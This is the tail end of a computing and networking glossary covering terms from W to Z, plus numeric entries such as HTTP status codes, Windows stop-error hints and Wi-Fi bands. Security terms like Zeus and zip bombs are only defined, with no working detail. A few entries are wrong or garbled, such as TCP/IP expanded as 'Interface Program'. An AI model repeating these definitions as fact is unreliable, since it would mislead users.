WP2 - WPA2 is a security standard for wireless networks based on the Advanced Encryption Standard technology (AES). It is used with the IEEE 802.11a, 802.11b, 802.11g, 802.11n and 802.11ac WiFi standards, encrypting data in order to prevent unauthorized access. WPA2 is the successor to WPA. It has superseded WEP encryption, which was used in the very early days of wireless networks, but which has now been deemed unsafe and vulnerable.

WP3 - WPA3, also known as Wi-Fi Protected Access 3, is the third iteration of a security certification program developed by the Wi-Fi Alliance. The WPA3 protocol provides new features for personal and enterprise use such as 256-bit Galois/Counter Mode Protocol (GCMP-256), 384-bit Hashed Message Authentication Mode (HMAC) and 256-bit Broadcast/Multicast Integrity Protocol (BIP-GMAC-256). The WPA3 protocol also supports security measures such as perfect forward secrecy.

top page


XHTML - XHTML is short for eXtensible HyperText Markup Language. XHTML is a hybrid between XML and HTML and designed for network devices as a method of displaying web pages on network and portable devices.

XML - XML is similar to HTML, XML uses tags to markup a document, allowing the browser to interpret the tags and display them on a page. Unlike HTML, XML language is unlimited (extensible) which allows self-defining tags and can describe the content instead of only displaying a page’s content. Using XML other languages such as RSS and MathML have been created, even tools like XSLT were created using XML

XMPP - XMPP which stands for Extensible Messaging and Presence Protocol, is a communications protocol for messaging systems. It is based on XML, storing and transmitting data in that format. It is used for sending and receiving instant messages, maintaining buddy lists, and broadcasting the status of one’s online presence. XMPP is an open protocol standard. Anyone can operate their own XMPP service, and use it to interact with any other XMPP service. The standard is maintained by XSF, the XMPP Standards Foundation.

XMT - XMT is also called Transmit. XMT is the method of sending data to an alternate computer or device.

XNS - XNS is short for Xerox Network Services, XNS is a proprietary network communications protocol developed by Xerox. XNS is no longer used and has been replaced by Transmission Control Protocol / Interface Program (TCP/IP).

top page


Y2K - Y2K is short for Year 2000 Bug or the millennium bug. Y2K is a warning first published by Bob Bemer in 1971 describing the issues of computers using a two-digit year date stamp.

Ymodem - A Ymodem is a file-transfer protocol developed by Chuck Forsburg, that is similar to the enhanced 1K version of Xmodem. Ymodem sends data in 1024-byte blocks, allows for multiple file transmissions at once, performs cyclical redundancy checks (CRC), and can reduce the transfer size to compensate for poor connections.

top page


Zero Day - A zero-day vulnerability is a software vulnerability that is not yet known by the vendor, and therefore has not been mitigated. A zero-day exploit is an attack directed at a zero-day vulnerability.

Zero Day Virus, Malware - A Zero Day virus, also known as Zero Day malware is a computer virus, Trojan horse or other malware, previously unknown by the software maker or by traditional antivirus producers. This means the vulnerability is also undisclosed publicly, though it might be known and quietly exploited by cyber attackers. Because it's not known yet, this means patches and antivirus software signatures are not yet available for it and there is little protection against an attack.

Zero Day Attack - A Zero Day (or Zero Hour or Day Zero) attack or threat is a computer threat that tries to exploit computer application vulnerabilities that are unknown to others or undisclosed to the software developer. Zero Day exploits (actual code that can use a security hole to carry out an attack) are used or shared by attackers before the software developer finds out about the vulnerability.

ZueS, Zbot - Zeus, also known as Zbot, is a notorious banking Trojan which infects Windows users and tries to retrieve confidential information from the infected computers. Once installed, it also tries to download configuration files and updates from the Internet. Its purpose is to steal private data from the victims, such as system information, passwords, banking credentials or other financial details. Zeus could be customized to gather banking details in specific countries and by using a vast array of methods. Using the retrieved information, cyber criminals could log into banking accounts and make unauthorized money transfers through a complex network of computers, thus leading to severe banking fraud. Operation Tovar, carried out in 2014, took down the ZeuS network of control and command servers, as it had done millions of dollars in damages and spread very quickly.

Zeus GameOver, Zeus P2P - Zeus GameOver is a variant of the ZeuS/Zbot family – the infamous financial stealing malware – which relied on a peer-to-peer botnet infrastructure to work. Zeus GameOver was used by cyber criminals to collect financial information (credentials, credit card numbers, passwords, etc.) and any other personal information which could be used to access the victim’s online banking accounts. GameOver Zeus is estimated to have infected 1 million users around the world and it was taken down in mid-2014 through Operation Tovar.

Zip Bomb - A Zip Bomb, also known as Zip of Death or Decompression Bomb, is a malicious archive file. When uncompressed, it expands dangerously, requiring large amounts of time, disk space and memory, causing the system to crash. Usually it's a small file, only up to a few hundred kylobytes, in the form of a loop, which will continuosly unpack itself until all system resources are exhausted. It's designed in order to disable the antivirus software, so that a more traditional virus sent afterwards could get into the system wihtout being detected.

Zombie - A zombie computer is one connected to the Internet, that in appearance is performing normally, but can be controlled by a hacker who has remote access to it and sends commands through an open port. Zombies are mostly used to perform malicious tasks, such as spreading spam or other infected data to other computers, or launch of DoS (Denial of Service) attacks, with the owner being unaware of it.

top page


0s - For a positive integer s, 0s is the string that consists of s consecutive 0 bits.

0x - A string of x zero bits. For example, 05 = 00000.

0xA - Check device drivers or services used by backup or antivirus utilities.

0xab - Hexadecimal notation that is used to define a byte (i.e., eight bits) of information, where a and b each specify four bits of information and have values from the range {0, 1, 2,…F}. For example, 0xc6 is used to represent 11000110, where c is 1100, and 6 is 0110.

0xD1 - Check device drivers or services used by backup or antivirus utilities.

0x00 - An all-zero octet. In this Recommendation, it is suggested for use as an ending indicator of a variable length data field, which holds the ASCII code for a character string.

0x0X - 8-bit binary representation of the hexadecimal number X, for example, 0x02 = 00000010.

0x1E - Illegal or unknown instruction; check the driver referenced in the error message.

0x24 - Test the hard disk for errors.

0x2E - Test memory modules; disable memory caching in system BIOS; check hardware configuration.

0x50 - Check printer drivers.

0x7B - Incorrect or missing hard disk device driver; see “Fixing 0x7B Errors,” this chapter, for details.

0x7F - Test hardware and RAM; check SCSI configuration if in use; make sure CPU is not overclocked.

0x9F - Check power management and CD-writing software; disable power management temporarily; reinstall or upgrade CD-writing software.

0xC21A - Reinstall third-party programs; use System File Checker with the Scannow option (SFC/Scannow) to check system files.

top page


1G - First Generation

1x - May refer to 1 times.

1.x - May refer to the version number.

1xx Informational response - An informational response indicates that the request was received and understood. It is issued on a provisional basis while request processing continues. It alerts the client to wait for a final response. The message consists only of the status line and optional header fields, and is terminated by an empty line. As the HTTP/1.0 standard did not define any 1xx status codes, servers must not send a 1xx response to an HTTP/1.0 compliant client except under experimental conditions.

100 Continue - The server, has received the request headers and the client should proceed to send the request body (in the case of a request for which a body needs to be sent; for example, a POST request). Sending a large request body to a server after a request has been rejected for inappropriate headers would be inefficient. To have a server check the request's headers, a client must send Expect: 100-continue as a header in its initial request and receive a 100 Continue status code in response before sending the body. If the client receives an error code such as 403 (Forbidden) or 405 (Method Not Allowed) then it shouldn't send the request's body. The response 417 Expectation Failed indicates that the request should be repeated without the Expect header as it indicates that the server doesn't support expectations (this is the case, for example, of HTTP/1.0 servers).

101 Switching Protocols - The requester has asked the server to switch protocols and the server has agreed to do so.

102 Processing - A WebDAV request may contain many sub-requests involving file operations, requiring a long time to complete the request. This code indicates that the server has received and is processing the request, but no response is available yet. This prevents the client from timing out and assuming the request was lost.

103 Early Hints - Used to return some response headers before final HTTP message.

top page


2TDEA - Two-key Triple Data Encryption Algorithm specified in [SP 800-67].

2G - Second Generation

2x - May refer to 2 times.

2.x - May refer to the version number.

2.4 GHz - 2.4 Gigahertz can reach up to 410ft in range with transfer speeds of up to 150 Mbps. Radio, garage door openers, microwaves, baby monitors, wireless speakers, 2 way Radio and TV use 2.4Ghz. Long range comms and between walls. Channels 1-13 are Wi-Fi standard with 12 & 13 used for low power conditions. 1, 6, 11 channels are considered to have no overlapping interference.

2xx Success - This class of status codes indicates the action requested by the client was received, understood and accepted.

200 OK - Standard response for successful HTTP requests. The actual response will depend on the request method used. In a GET request, the response will contain an entity corresponding to the requested resource. In a POST request, the response will contain an entity describing or containing the result of the action.

201 Created - The request has been fulfilled, resulting in the creation of a new resource.

202 Accepted - The request has been accepted for processing, but the processing has not been completed. The request might or might not be eventually acted upon, and may be disallowed when processing occurs.

203 Non-Authoritative Information (since HTTP/1.1) - The server is a transforming proxy (e.g. a Web accelerator) that received a 200 OK from its origin, but is returning a modified version of the origin's response.

204 No Content - The server successfully processed the request and is not returning any content.

205 Reset Content - The server successfully processed the request, but is not returning any content. Unlike a 204 response, this response requires that the requester reset the document view.

206 Partial Content - The server is delivering only part of the resource (byte serving) due to a range header sent by the client. The range header is used by HTTP clients to enable resuming of interrupted downloads, or split a download into multiple simultaneous streams.

207 Multi-Status - The message body that follows is by default an XML message and can contain a number of separate response codes, depending on how many sub-requests were made.

208 Already Reported - The members of a DAV binding have already been enumerated in a preceding part of the (multistatus) response, and are not being included again.

226 IM Used - The server has fulfilled a request for the resource, and the response is a representation of the result of one or more instance-manipulations applied to the current instance.

2600 - Commonly used name for news or information containing information about hacking and phreaking.

top page


3DES - An implementation of the data encryption standard (DES) algorithm that uses three passes of the DES algorithm instead of one as used in ordinary DES applications. Triple DES provides much stronger encryption than ordinary DES but it is less secure than advanced encryption standard (AES). Rationale: The terminology has been changed by NIST.

3G - Third Generation

3rd Party Cookie - A cookie's domain attribute will match the domain that is shown in the web browser's address bar. This is called a first-party cookie. A third-party cookie, however, belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such as banner advertisements. This opens up the potential for tracking the user's browsing history and is often used by advertisers in an effort to serve relevant advertisements to each user.

3-way Handshake - Machine A sends a packet with a SYN flag set to Machine B. B acknowledges A's SYN with a SYN/ACK. A acknowledges B's SYN/ACK with an ACK.

3x - May refer to 3 times.

3.x - May refer to the version number.

3xx Redirection - This class of status code indicates the client must take additional action to complete the request. Many of these status codes are used in URL redirection. A user agent may carry out the additional action with no user interaction only if the method used in the second request is GET or HEAD. A user agent may automatically redirect a request. A user agent should detect and intervene to prevent cyclical redirects.

300 Multiple Choices - Indicates multiple options for the resource from which the client may choose (via agent-driven content negotiation). For example, this code could be used to present multiple video format options, to list files with different filename extensions, or to suggest word-sense disambiguation.

301 Moved Permanently - This and all future requests should be directed to the given URI.

302 Found (Previously "Moved temporarily") - Tells the client to look at (browse to) another URL. 302 has been superseded by 303 and 307. This is an example of industry practice contradicting the standard. The HTTP/1.0 specification (RFC 1945) required the client to perform a temporary redirect (the original describing phrase was "Moved Temporarily"), but popular browsers implemented 302 with the functionality of a 303 See Other. Therefore, HTTP/1.1 added status codes 303 and 307 to distinguish between the two behaviours. However, some Web applications and frameworks use the 302 status code as if it were the 303.

303 See Other (since HTTP/1.1) - The response to the request can be found under another URI using the GET method. When received in response to a POST (or PUT/DELETE), the client should presume that the server has received the data and should issue a new GET request to the given URI.

304 Not Modified - Indicates that the resource has not been modified since the version specified by the request headers If-Modified-Since or If-None-Match. In such case, there is no need to retransmit the resource since the client still has a previously-downloaded copy.

305 Use Proxy (since HTTP/1.1) - The requested resource is available only through a proxy, the address for which is provided in the response. For security reasons, many HTTP clients (such as Mozilla Firefox and Internet Explorer) do not obey this status code.

306 Switch Proxy - No longer used. Originally meant "Subsequent requests should use the specified proxy."

307 Temporary Redirect (since HTTP/1.1) - In this case, the request should be repeated with another URI; however, future requests should still use the original URI. In contrast to how 302 was historically implemented, the request method is not allowed to be changed when reissuing the original request. For example, a POST request should be repeated using another POST request.[

308 Permanent Redirect - The request and all future requests should be repeated using another URI. 307 and 308 parallel the behaviors of 302 and 301, but do not allow the HTTP method to change. So, for example, submitting a form to a permanently redirected resource may continue smoothly.

top page


4G - Forth Generation

4x - May refer to 4 times.

4.x - May refer to the version number.

4xx Client errors - This class of status code is intended for situations in which the error seems to have been caused by the client. Except when responding to a HEAD request, the server should include an entity containing an explanation of the error situation, and whether it is a temporary or permanent condition. These status codes are applicable to any request method. User agents should display any included entity to the user.

400 Bad Request - The server cannot or will not process the request due to an apparent client error (e.g., malformed request syntax, size too large, invalid request message framing, or deceptive request routing).

401 Unauthorized - Similar to 403 Forbidden, but specifically for use when authentication is required and has failed or has not yet been provided. The response must include a WWW-Authenticate header field containing a challenge applicable to the requested resource. See Basic access authentication and Digest access authentication. 401 semantically means "unauthorised",[34] the user does not have valid authentication credentials for the target resource.

402 Payment Required - Reserved for future use. The original intention was that this code might be used as part of some form of digital cash or micropayment scheme, as proposed, for example, by GNU Taler, but that has not yet happened, and this code is not usually used. Google Developers API uses this status if a particular developer has exceeded the daily limit on requests.[36] Sipgate uses this code if an account does not have sufficient funds to start a call. Shopify uses this code when the store has not paid their fees and is temporarily disabled. Stripe uses this code for failed payments where parameters were correct, for example blocked fraudulent payments.

403 Forbidden - The request contained valid data and was understood by the server, but the server is refusing action. This may be due to the user not having the necessary permissions for a resource or needing an account of some sort, or attempting a prohibited action (e.g. creating a duplicate record where only one is allowed). This code is also typically used if the request provided authentication via the WWW-Authenticate header field, but the server did not accept that authentication. The request should not be repeated.

404 Not Found - The requested resource could not be found but may be available in the future. Subsequent requests by the client are permissible.

405 Method Not Allowed - A request method is not supported for the requested resource; for example, a GET request on a form that requires data to be presented via POST, or a PUT request on a read-only resource.

406 Not Acceptable - The requested resource is capable of generating only content not acceptable according to the Accept headers sent in the request.

407 Proxy Authentication Required - The client must first authenticate itself with the proxy.

408 Request Timeout - The server timed out waiting for the request. According to HTTP specifications: "The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time."

409 Conflict - Indicates that the request could not be processed because of conflict in the current state of the resource, such as an edit conflict between multiple simultaneous updates.

410 Gone - Indicates that the resource requested is no longer available and will not be available again. This should be used when a resource has been intentionally removed and the resource should be purged. Upon receiving a 410 status code, the client should not request the resource in the future. Clients such as search engines should remove the resource from their indices. Most use cases do not require clients and search engines to purge the resource, and a "404 Not Found" may be used instead.

411 Length Required - The request did not specify the length of its content, which is required by the requested resource.

412 Precondition Failed - The server does not meet one of the preconditions that the requester put on the request header fields.

413 Payload Too Large - The request is larger than the server is willing or able to process. Previously called "Request Entity Too Large".

414 URI Too Long - The URI provided was too long for the server to process. Often the result of too much data being encoded as a query-string of a GET request, in which case it should be converted to a POST request. Called "Request-URI Too Long" previously.

415 Unsupported Media Type - The request entity has a media type which the server or resource does not support. For example, the client uploads an image as image/svg+xml, but the server requires that images use a different format.

416 Range Not Satisfiable - The client has asked for a portion of the file (byte serving), but the server cannot supply that portion. For example, if the client asked for a part of the file that lies beyond the end of the file. Called "Requested Range Not Satisfiable" previously.

417 Expectation Failed - The server cannot meet the requirements of the Expect request-header field.

418 I'm a teapot - This code was defined in 1998 as one of the traditional IETF April Fools' jokes, in RFC 2324, Hyper Text Coffee Pot Control Protocol, and is not expected to be implemented by actual HTTP servers. The RFC specifies this code should be returned by teapots requested to brew coffee. This HTTP status is used as an Easter egg in some websites, including

421 Misdirected Request - The request was directed at a server that is not able to produce a response[57] (for example because of connection reuse).

422 Unprocessable Entity - The request was well-formed but was unable to be followed due to semantic errors.

423 Locked - The resource that is being accessed is locked.

424 Failed Dependency - The request failed because it depended on another request and that request failed (e.g., a PROPPATCH).

425 Too Early - Indicates that the server is unwilling to risk processing a request that might be replayed.

426 Upgrade Required - The client should switch to a different protocol such as TLS/1.0, given in the Upgrade header field.

428 Precondition Required - The origin server requires the request to be conditional. Intended to prevent the 'lost update' problem, where a client GETs a resource's state, modifies it, and PUTs it back to the server, when meanwhile a third party has modified the state on the server, leading to a conflict.

429 Too Many Requests - The user has sent too many requests in a given amount of time. Intended for use with rate-limiting schemes.

431 Request Header Fields Too Large - The server is unwilling to process the request because either an individual header field, or all the header fields collectively, are too large.

451 Unavailable For Legal Reasons - A server operator has received a legal demand to deny access to a resource or to a set of resources that includes the requested resource.

top page


5G - Fifth Generation

5x - May refer to 5 times.

5.x - May refer to the version number.

5 GHz - 5 Gigahertz can reach up to 820ft in range with transfer speeds of up to 1 Gbps. Wireless security and network cards, laptops, cell phones, bluetooth use 5Gz. Short range comms without barriers in place. The first 36, 40, 44, 48 are called UNII-1 channels and considered best for 5Ghz.

5xx Server errors - The server failed to fulfill a request. Response status codes beginning with the digit "5" indicate cases in which the server is aware that it has encountered an error or is otherwise incapable of performing the request. Except when responding to a HEAD request, the server should include an entity containing an explanation of the error situation, and indicate whether it is a temporary or permanent condition. Likewise, user agents should display any included entity to the user. These response codes are applicable to any request method.

500 Internal Server Error - A generic error message, given when an unexpected condition was encountered and no more specific message is suitable.

501 Not Implemented - The server either does not recognize the request method, or it lacks the ability to fulfil the request. Usually this implies future availability (e.g., a new feature of a web-service API)

502 Bad Gateway - The server was acting as a gateway or proxy and received an invalid response from the upstream server.

503 Service Unavailable - The server cannot handle the request (because it is overloaded or down for maintenance). Generally, this is a temporary state.

504 Gateway Timeout - The server was acting as a gateway or proxy and did not receive a timely response from the upstream server.

505 HTTP Version Not Supported - The server does not support the HTTP protocol version used in the request.

506 Variant Also Negotiates - Transparent content negotiation for the request results in a circular reference.

507 Insufficient Storage - The server is unable to store the representation needed to complete the request.

508 Loop Detected - The server detected an infinite loop while processing the request (sent instead of 208 Already Reported).

510 Not Extended - Further extensions to the request are required for the server to fulfil it.

511 Network Authentication Required - The client needs to authenticate to gain network access. Intended for use by intercepting proxies used to control access to the network (e.g., "captive portals" used to require agreement to Terms of Service before granting full Internet access via a Wi-Fi hotspot).

top page


6b/8b - 6b/8b is a line code that expands 6-bit codes to 8-bit symbols for the purposes of maintaining DC-balance in a communications system.

6 Core - hexa-core

6x - May refer to 6 times.

6.x - May refer to the version number.

top page


7b - Series is an analog signal conditioning subsystem optimized for the sensor input and output needs of continuous control applications.

7x - May refer to 7 times.

7.x - May refer to the version number.

top page


8b/10b - 8b/10b is a line code that maps 8-bit words to 10-bit symbols to achieve DC-balance and bounded disparity, and yet provide enough state changes to allow reasonable clock recovery.

8 Core - Each core is capable of running one task independent of the others. That means it can run 8 tasks simultaneously.

8D - 8D stands for the 8 disciplines of problem solving. They represent 8 steps to take to solve difficult, recurring or critical problems (often customer failures or major cost drivers). The structured approach provides transparency, drives a team approach, and increases the chance of solving the problem.

8DPSK - 8 Phase Differential Phase Shift Keying

8x - May refer to 8 times.

8.x - May refer to the version number.

802.11 Wi-Fi - Standards developed by The Institute of Electrical and Electronics Engineers IEEE. Standards increase Wireless Local Area Network (WLAN) speeds, lower energy consumption, and improve reliability while extending wireless transmission ranges.

802.11ah - 5 and 2.4GHz with data transfer up to 347Mbps.

802.11ad - 60GHz 3.3 foot range, with data transfer up to 6.7Gbps.

802.11ac Wi-Fi 5 - 5GHz (MIMO) with data transfer up to 3.46Gbps. Better bandwidth quality.

802.11a - 5GHz band with data transfer up to 54Mbps.

802.11b - 2.4GHz band with data transfer up to 11Mbps.

802.11g - 2.4GHz band with data transfer up to 54Mbps.

802.11n Wi-Fi 4 - 5 and 2.4GHz band with data transfer up to 500Mbps under ideal circumstances. 802.11n devices support Multiple In/Out (MIMO) data transfer using multiple streams in one instance.

top page


9C - 9C survey at 15 GHz (9C) is an astronomical catalogue generated from the radio observations of the Ninth Cambridge survey at 15 GHz.

9x - May refer to 9 times.

9.x - May refer to the version number.

top page

ref: Techopedia, Wikipedia.

Indexed Phishing Attacks

© 2022